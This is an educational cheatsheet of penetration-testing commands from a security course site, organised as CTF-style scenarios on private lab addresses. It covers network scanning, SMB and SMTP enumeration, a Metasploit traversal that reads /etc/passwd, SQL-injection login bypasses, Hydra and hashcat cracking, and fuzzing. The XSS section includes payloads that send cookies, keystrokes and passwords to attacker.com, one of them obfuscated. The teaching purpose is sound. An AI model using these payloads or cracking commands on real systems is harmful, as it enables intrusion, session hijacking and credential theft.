Samer Aoudi
Courses Ethical Hacking Web Security Tutorials Digital Forensics Risk Management Intro to Information Security Incident Response
CTF Platform Career Paths Certifications Security Tools Awareness Blog About LinkedIn
Cybersecurity Commmands Cheatsheet

Whether you are performing a penetration test, competing in a CTF challenge, practicing, or studying for a college exam, you will need to write and execute commands. If you're like most of my students, you probably forget where to start, what tool to use, and what command syntax or options to apply. I would like to help with a quick reference (cheatsheet) and scenarios all on a single webpage.

A quick scenario-based reference for common cybersecurity commands and tools.

Regardless of the task at hand, you should have your "command center" ready with all the relevant tools. In case you're not sure what tools you need, I compiled a list to get you started:

There are hundreds of tools and thousands of commands combinations; so it goes without saying that I cannot cover all tools, commands, or options. Instead, I followed a scenario-based approach organized by specific cybersecurity tasks. To make it a little more interesting, the tasks are based on common CTF categories:

Network Web
Forensics Cryptography
OSINT Stenography
Reversing Mobile

Before you proceed, you should have Kali Linux and couple of target machine for practice. If you don't yet have your own setup, watch a video that guides you through setting up your first Ethical Hacking Lab including Kali Linux and two targets (Click here »).
Cybersecurity Tools
Network Security

Network Security involves protecting the network infrastructure, and related tasks often includes scanning. Scanning is the process of discovering systems on a network including open ports and running services (applications). Pen testers and hackers would try to discover active hosts on a network and produce a network map (network sweeping + network tracing). Next, for each discovered host, they would try to identify open ports (i.e. running services), including the version of each running service (version scanning).

Related demos:


Handy tools/commands worth including:

# netmask to generate and produce network addresses
# Convert IP address to binary
$ netmask -b 10.19.44.22
# Convert IP address to octal
$ netmask -o 10.19.44.22
# Convert IP address to hex
$ netmask -x 10.19.44.22
# Standard address/netmask pair
$ netmask -s 10.19.44.22
# IP address range
$ netmask -r 10.19.44.22/8

Scanning
Scenario #1 -Host Discovery
  • Overview: You either have an address of a target network, or already part of the network. Your task is to discover all active hosts on the network. The outcome would be a list of IP addresses.
  • Approach:
    1. Get the network address and identify the class (A » /8 OR B » /16 OR C » /24)
    2. Perform a network scan
  • Commands: The following is a list of commands (you may need to use a combination of these commands and not necessarily all)
# Get the network IP address (if not given)
$ ip a
# Use nmap to scan the network
$ nmap 192.168.44.0/24
# Use nmap but skip port scan (faster)
$ nmap -sn 192.168.44.0/24
Scenario #2 -Host Probing
  • Overview: After scanning a network, you discovered the following active host (192.168.44.22). Your task is to find out what ports are open and what services are running on this host. In fact, you want to discover as much as possible about this host.
  • Approach:
    1. Perform a port scan to discover open ports
    2. Probe specific ports to enumerate additional information
    3. Use different techniques to get better results
    4. Probe the host for additional data such MAC, IPv6, etc.
  • Commands: The following is a list of nmap commands (you may need to use a combination of these commands and not necessarily all)
# Use nmap to perform a quick port scan (scans only 1023 known ports)
$ nmap 192.168.44.22
# Perfrom a deep scan (all 65,536 ports)
$ nmap -p0-65535 192.168.44.22
# Get the version of the running services
$ nmap -sV 192.168.44.22
# Get the OS of the host
$ nmap -O 192.168.44.22
# perform a UDP scan to discover UDP services
$ nmap -sU 192.168.44.22
# Try different scans on a specific port (HTTP → 80)
# FIN scan: closed port responds with RST
$ nmap -sF -p80 192.168.44.22
# ACK scan: to get past firewalls
$ nmap -sA -p80 192.168.44.22
# SYN scan: stealthy scan
$ nmap -sS -p80 192.168.44.22
# TCP Connect scan: completes the 3-way handshake
$ nmap -sT -p80 192.168.44.22
# Null scan: all flags are off
$ nmap -sN -p80 192.168.44.22
# Use nmap's custom script engine to enumerate more data
$ nmap -sC -p80 192.168.44.22
  • Commands: The following is a list of hping3 commands (you may need to use a combination of these commands and not necessarily all)
# Probe the target with raw IP packets
$ hping3 -0 192.168.44.22
# Probe the target with raw ICMP packets
$ hping3 -1 192.168.44.22
# Use UDP mode
$ hping3 -2 192.168.44.22
# Use scan mode
$ hping3 -8 192.168.44.22
# Use listen mode
$ hping3 -9 192.168.44.22
# Default hping3 packets are TCP with no flags; set different flags and target specific ports
# SYN scan
$ hping3 -S -p80 192.168.44.22
# ACK scan
$ hping3 -A -p80 192.168.44.22
# RST scan
$ hping3 -R -p80 192.168.44.22
# FIN scan
$ hping3 -F -p80 192.168.44.22
# Set multiple flags: FIN, PSH, URG
$ hping3 -FPU -p80 192.168.44.22
  • Commands: The following is a list of other handy tools/commands (you may need to use a combination of these commands and not necessarily all)
# Get the MAC address of the target
$ arp -r 192.168.44.22
# Get IPv6 address of the target using the MAC address we discovered
$ atk6-address6 00:05:29:5a:66:f4
# Send ICMP6 packets to the IPv6 address we discovered
# atk6-thcping6 <interface> <source-ipv6> <destination-ipv6>
$ atk6-thcping6 eth0 fe80::20c:29ff:fe34:884e fe80::20c:29ff:fe5a:66f4
Scenario #3 -SMB Analysis
  • Overview: The Server Message Block protocol (SMB protocol) is a client-server  protocol for sharing and accessing files, printers, and other resources on a network. SMB enables us to access files and connect to resources like printers on remote hosts. When SMB runs on top of Network Basic Input/Output System over Transmission Control Protocol/Internet Protocol (NetBIOS over TCP/IP, or NBT) it used ports 137, 138 and 139. It is common to see SMB running on port 445. In terms of security, SMB 1.0 was recently exploited with the WannaCry ransomware. SMB 3.0 and later are more secure with added end-to-end data encryption, as an example.

    Your target's ports 139 and 445 are open. Your nmap -sV scan revealed that there is a Samba server running. This means that the target may have SMB resources and your job is to discover them and enumerate as much information as possible.
  • Approach:
    1. Scan the network for NetBIOS information
    2. Enumerate SMB resources (e.h., network shares; printers; users; password policy; etc.)
    3. Attempt anonymous SMB access using an FTP-like client (e.g. smbclient)
    4. If anonymous access is successful, attempt to gain access to the root filesystem using an anonymous connection and a writeable share (using metasploit)
    5. Access the /etc/passwd file (a text-based database of information about users; an x character indicates an encrypted password)
  • Commands: The following is a list of commands (you may need to use a combination of these commands and not necessarily all)

Related demos:

# Get the NetBIOS table
$ nbtscan -v 192.168.44.0/24
# Enumerate SMB resources
$ smbmap -h 192.168.44.22
# More enumeration
$ enum4linux -a 192.168.44.22
# Attetmpt access with no password
$ smbclient -L //192.168.44.22
# If anonymous access is successful, start Metasploit
$ msfconsole
# Use the SAMBA Symlink attack module
msf6 > use auxiliary/admin/smb/samba_symlink_traversal
# Set the target IP
msf auxiliary(sadmin/smb/samba_symlink_traversal) > set RHOST 192.168.44.22
# Set the writeable share
msf auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
# Run the module
msf auxiliary(admin/smb/samba_symlink_traversal) > run
# Access the writeable share (tmp in this case)
$ smbclient //192.168.44.22/tmp
# Go to the etc directory
$ smb: \> cd rootfs/etc
# Access the passwd file
$ smb: \rootfs\etc\> more passwd
Scenario #4 -SMTP Analysis
  • Overview: SMTP, or The Simple Mail Transfer Protocol, listening on port 25 is responsible for sending email messages. The SMTP server pushes received messages to other servers that would be responsible for delivering the message (namely a POP3 or an IMAP server).

    Your target's ports 25 is open. During the reconnaissance phase, we collect information about our target, and therefore we want to find out what the SMTP server has; what it's capable of; what commands are allowed; what extensions are present; and so on.
  • Approach:
    1. Enumerate the SMPT service
    2. Enumerate target users
    3. Send custom test messages
  • Commands: The following is a list of commands (you may need to use a combination of these commands and not necessarily all)

Related demos:

# Enumerate SMPT using nmap -sC
$ nmap -sC -p25 192.168.44.22
# Send a test message to the SMTP server
# Use swaks with "samer as the recepient"
$ swaks -s 192.168.44.22 -t samer
# The made-up address will be rejected
# Enumerate users for additional testing
$ enum4linux -U 192.168.44.22
# Retry with one of the enumerated users
$ swaks -s 192.168.44.22 -t root
# Send a custom message from a customer sender
$ swaks -s 192.168.44.22 -t root -f samer -b "Hi there!"
Web Security

Security measures taken to protect organizational infrastructure at the network level are not enough to protect a web application against attacks. Web apps are attacked at the application level. The inherent problem of the Web is that [web] traffic is flowing in and out between the client and the server. Ports on both sides are open and ready to accept web traffic. Therefore, security tools, like the firewall, may not protect against web attacks since they are configured to let web traffic through.

SQL Injection
Scenario #1 -Bypassing Login
  • Overview: You come across a login page but you don't know have the credentials (username/password). You can apply common techniques to bypass authentication using SQL Injection
  • Approach: You must first understand the anatomy of the SQL SELECT statement used to authenticate a user. Let us assume, you typed samer and sam123 as username/password in the login form fields:
    SELECT * FROM users WHERE username=‘samer’ AND password=‘sam123’
    Our attack approach would be alter the logic of the SELECT statement by injecting some strings. Using comments can help us do that.
  • Commands: The following is a list of strings you can type in the username field to bypass authentication:

# Start with known users (e.g., admin)
admin' --
admin' #
admin'/*
# Without username
' or 1=1--
' or 1=1#
' or 1=1/*') or '1'='1--
') or ('1'='1--
XSS

XSS stands for "Cross-Site Scripting." It's a type of security vulnerability that can be exploited by attackers to inject malicious code into web pages viewed by other users.

The basic idea behind an XSS attack is that a website or application fails to properly sanitize user input, allowing an attacker to inject malicious code into a page that is then executed by unsuspecting users. This can take many forms, but one common approach is to inject JavaScript code that steals user data, such as login credentials or credit card numbers, or redirects the user to a malicious website.

Scenario #1 -Various Attacks
  • Overview: There are different types of XSS attacks that exploit vulnerabilities in web applications or user behavior to execute malicious code on a victim's browser, and can result in the theft of sensitive information or the compromise of the victim's computer or network. The following are common attacks:
    • Reflected XSS Attack: An attacker sends a link to a victim that contains a script that is executed by the victim's browser when they click on the link. The script can steal the victim's session ID or other sensitive information.
    • Stored XSS Attack: An attacker injects a script into a web page or database that is executed whenever a user views the page or data. This type of attack can be more difficult to detect and prevent than a reflected XSS attack.
    • DOM-Based XSS Attack: An attacker exploits a vulnerability in client-side JavaScript code to inject a script that is executed by the victim's browser.
    • Cookie Theft: An attacker injects a script that steals a user's cookies, allowing them to hijack the user's session and access sensitive data.
    • Clickjacking: An attacker uses CSS or other techniques to overlay an invisible or disguised button or link over a legitimate button or link on a website, tricking the user into clicking on the attacker's button or link.
    • Keylogging: An attacker injects a script that logs the user's keystrokes, allowing them to steal sensitive information such as passwords and credit card numbers.
    • Phishing: An attacker creates a fake login page that looks like a legitimate site, and uses an XSS attack to redirect the victim to the fake page, allowing them to steal the victim's login credentials.
    • XSS via Email: An attacker sends an email with a script that is executed when the victim opens the email or clicks on a link in the email.
    • XSS via Social Media: An attacker posts a script on a social media site that is executed when the victim views the post or clicks on a link in the post.
  • Approach: You must inject the payload (i.e., code or script) in various places and using different techniques depending on the situation.
  • Commands: The following are sample payloads corresponding to the types listed in the scenario:

# Reflected XSS Attack:
http://example.com/search?q=<script>alert(document.cookie);</script>
# Stored XSS Attack:
<script>alert(document.cookie);</script>
# DOM-Based XSS Attack:
http://example.com/search#<script>alert(document.cookie);</script>
# Cookie Theft:
<script>new Image().src="http://attacker.com/cookie-stealer.php?cookie="+document.cookie;;</script>
# Clickjacking:
<div style="position:absolute; top:0; left:0; width:100%; height:100%; z-index:9999;">
  <iframe src="http://example.com/login.php"></iframe>
</div>
# Keylogging:
<script>new Image().src="http://attacker.com/keylogger.php?keystrokes="+document.getElementById('password').value;</script>
# Phishing:
<script>window.location="http://attacker.com/login.php?username="+document.getElementById('username').value+"&password="+document.getElementById('password').value;</script>
# XSS via Email:
<img src="http://example.com/logo.png" onerror="alert(document.cookie);">
# XSS via Social Media:
<div onclick="alert(document.cookie);">Click here to see cute cat pictures!</div>
Scenario #2 -Encoding

Often, the web application would validate user input and employ best-practices to prevent XSS. Attackers can use various technique to obfuscate their payload (e.g., using encoding). The following are online encoders/decoders that can come in handy:

  1. Google Toolbox
  2. ASCII Code
  3. ASCII Converter

# URL/Percent Encoding the < and >:
http://example.com/search?q=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
# HTML Entity Encoding:
&lt;script&gt;alert(document.cookie);&lt;/script&gt;
# Using the encodeURIComponent() function:
<script>new Image().src="http://attacker.com/keylogger.php?keystrokes="+encodeURIComponent(document.getElementById('password ').value);</script>
# String.fromCharCode() returns the payload string
# eval() evaluates a string as PHP code; i.e., executes the code
<div onclick="eval(String.fromCharCode(97,108,101,114, 116, 40,100,111,99,117,109,101, 110,116,46,99,111,111, 107,105,101,41))">Click here to see cute cat pictures!</div>
Cryptography

Cryptography is the science and practice of securing information by transforming it into an unreadable format, known as ciphertext, using various algorithms and mathematical techniques. The primary purpose of cryptography is to protect the confidentiality, integrity, and authenticity of data, ensuring that only authorized individuals can access and understand the information.

Hashing is a process of converting input data (or 'message') into a fixed-length string of characters, which is typically a hexadecimal or binary representation. The output of this process is called a hash value or hash code. Hashing is used to securely store passwords.

Password Cracking
Scenario #1 -Online Attacks
  • Overview: A target has an online service (e.g., SSH, Telnet, FTP, etc.) that legitimate users access using their usernames and passwords.
  • Approach: Assuming we managed to enumerate possible usernames, we will use a brute-force attack and attempt to login by systematically trying all possible combinations of passwords until the correct one is found. More specifically, we will use a dictionary attack.
  • Commands: A good tool for performing online attacks is Hydra. The following commands can help:
    You can download the popular wordlist rockyou.txt.gz (has 14 million passwords) here »

# Assuming: username is admin
# Service is SSH
# Dictionary, or wordlist, is rockyou.txt
# Replace the IP with your target IP
sudo hydra -l "admin" -P /usr/share/wordlists/rockyou.txt 192.168.44.31 ssh
# Using a file with possible usernames
sudo hydra -L myusernames.txt -P /usr/share/wordlists/rockyou.txt 192.168.44.31 ssh
# Assuming service is FTP
sudo hydra -L myusernames.txt -P /usr/share/wordlists/rockyou.txt ftp://192.168.44.31
# Assuming service is Telnet
sudo hydra -L myusernames.txt -P /usr/share/wordlists/rockyou.txt 192.168.44.31 telnet
# Successful attack output would look like this
[23][telnet] host: 192.168.44.31 login: admin password: pass123
1 of 1 target successfully completed, 1 valid password found
Scenario #2 -Offline Attacks
  • Overview: Online attacks may not be the best approach because a brute-force attack will generate suspicious traffic that will most likely get blocked by firewalls, or the account itself may be locked due to multiple unsuccessful attempts. Instead of storing user passwords directly, systems store their hash values. When a user logs in, the system hashes the entered password and compares it to the stored hash. This way, even if the database is compromised, attackers cannot easily obtain the actual passwords.
  • Approach: Let us assume we managed to get a password hash, we will use a brute-force attack, like before, but without trying to login into the service.
  • Commands: A good tool for performing offline attacks is hashcat. Note: Hashcat requires a lot of memory (min 4GB for a Kali VM). The following commands can help:

# Assuming the hash is stored in a the file hashes
# Dictionary, or wordlist, is mylist.txt
# -a is attack type; 0 is straight
# -m is hash method; 0 is MD5
hashcat -a 0 -m 0 hashes /usr/share/wordlists/mylist.txt
# Save cracked passwords in a file
# -o is for output file
hashcat -a 0 -m 0 -o crackedpasswords.txt hashes /usr/share/wordlists/mylist.txt
Vulnerability Analysis

Vulnerability Assessment and Analysis, is the process of identifying all vulnerabilities associated with an information asset. There are many techniques that can help us identify vulnerabilities; let's see some.

Fuzzing
Scenario #1 -Recursive Fuzzing
  • Overview: "Fuzz testing or Fuzzing is a Black Box software testing technique, which basically consists in finding implementation bugs using malformed/semi-malformed data injection in an automated fashion" (Source: OWASP). Let's say you want to fuzz a system to cause errors or failures that may reveal additional information.
  • Approach: A common approach to fuzzing is to define lists of "known-to-be-dangerous values" (fuzz vectors) for each of the following types, and to inject them:
       Integers: zero, possibly negative or very big numbers
       Chars: escaped, interpretable characters / instructions (ex: For SQL Requests, quotes / commands…)
       BinaryBinary: random ones
    However, you really would want to automate fuzzing to save precious time.
  • Commands: The following is fuzzing toolkit that can help:

# Locate the Spike Script files (.spk)
locate .spk
# Select the spike suitable for your target
# Use it against your target
generic_send_tcp <host> <port> <.spk file> SKIPVAR SKIPSTR
# Example
generic_send_tcp 192.168.44.22 25 /usr/share/spike/audits/smtp1.spk 0 0
Reverse Engineering

Reverse engineering is the process of analyzing a system, device, or software in order to understand its inner workings, functionality, and design. The goal of reverse engineering is to take apart a system or software, understand how it works, and potentially modify or improve it.

In the context of software, and more specifically security, reverse engineering typically involves analyzing the compiled code of an application or system to understand its structure, logic, and behavior. This can involve decompiling, disassembling, or debugging the code to gain insight into its workings. Ghidra, for instance, is a reverse engineering tool that was developed by the NSA and released in 2019. This has proved especially popular with malware analysts as it’s what’s known as a disassembly tool.

In a CTF challenge for instance,

Disassembling Code
Scenario #1 -Crack The Code
  • Overview: You have been given a binary executable file called "secret_code". Your goal is to reverse engineer the code and find the correct input string that will make the program print the flag. The flag is in the format "Flag{xxxxxx}".
  • Approach: You can use a disassembler such as radare2, IDA Pro, or Ghidra to decompile the binary and analyze the assembly code. The challenge may include obfuscation techniques, such as code encoding, obfuscation, encryption or packing to make it harder to analyze the code.
  • Commands: The following radare2 command can help get String values from an executable file. In this example, the flag is in cleartext:

# Running radare2 on our binary
r2 secret_code
# Search for interesting strings using izz
[0x00401000]> izz
# The above will show ASCII and Unicode strings
# Sample Output
.data ascii Flag{FOUND}\n
#cybersecurity #tools #kalilinux #securitytools
Ads by Google
               
© Samer Aoudi 2005-2024